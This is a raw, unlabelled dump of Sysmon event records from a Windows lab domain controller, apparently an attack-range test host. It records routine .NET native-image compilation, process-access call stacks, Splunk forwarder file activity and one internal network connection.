21:04:48.693{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F0-60D3-0904-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:48.194{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F0-60D3-0804-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.178{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F0-60D3-0804-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:48.178{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F0-60D3-0804-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:48.146{4DB9351A-A1EF-60D3-0704-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\154c-0\Microsoft.Windows.ServerManager.NPASRole.Plugin.dll2021-06-23 21:04:48.146 354300x800000000000000021055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.170{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61430-false10.0.1.12-8000- 10341000x800000000000000021054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.006{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0704-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:49.834{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C343E0D756013E235F71277F953BD97,SHA256=E66DCAF849C41EC78ACBAB634088F36E814E1BB624817F8462F45D7BB4137282,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:50.906{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6D3292B9A40070E0548C944B34826E0,SHA256=666F2DD24B5ACB17647652989DF0D7BF384261C6C430A5DE5691BC139531B07A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:51.918{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A713CC14FE9589644B8842009F976F7B,SHA256=E191D32E512C855D3F475C08111BCDB9EFF4B577DE201452A00653A42353AA8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:52.997{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=050C48D1A8587B1C88C4DDF830B5711C,SHA256=19E3A4F7A381B69E7B43D03930E899FD9A796D8AA3F92E1787EC53BA3E3CEA3B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:53.950{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F5-60D3-0C04-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.935{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F5-60D3-0C04-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:53.935{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F5-60D3-0C04-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:53.856{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F5-60D3-0B04-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.778{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F5-60D3-0B04-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:53.778{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F5-60D3-0B04-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.528{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A531BCDF756A24B0D8B34E560401FB9,SHA256=81D2508810CB4842D93730F5714FA0139C265044C33DF5B1FF437789F1231295,IMPHASH=00000000000000000000000000000000falsetrue 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1F7-60D3-1604-00000000CF01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.780{4DB9351A-A1F7-60D3-1604-00000000CF01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D80E669F7F2554D7099F108577E7022,SHA256=EA25C1251787C7FF826F5EF09AB186BED8C1FA09007D715A265D697E66345385,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:55.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F7-60D3-1504-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.559{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F7-60D3-1504-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:55.559{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F7-60D3-1504-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:55.512{4DB9351A-A1F6-60D3-1404-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\280-0\Microsoft.Windows.ServerManager.ServerComponentDeploymentWizard.dll2021-06-23 21:04:55.512 23542300x800000000000000021128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:55.293{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E43C7E682F1241BD2336A16C19B93E1,SHA256=38944113D7F2634E51C6A518386D4A4B6696994592E962B710EF72A8F1D0C614,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1F6-60D3-1304-00000000CF01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
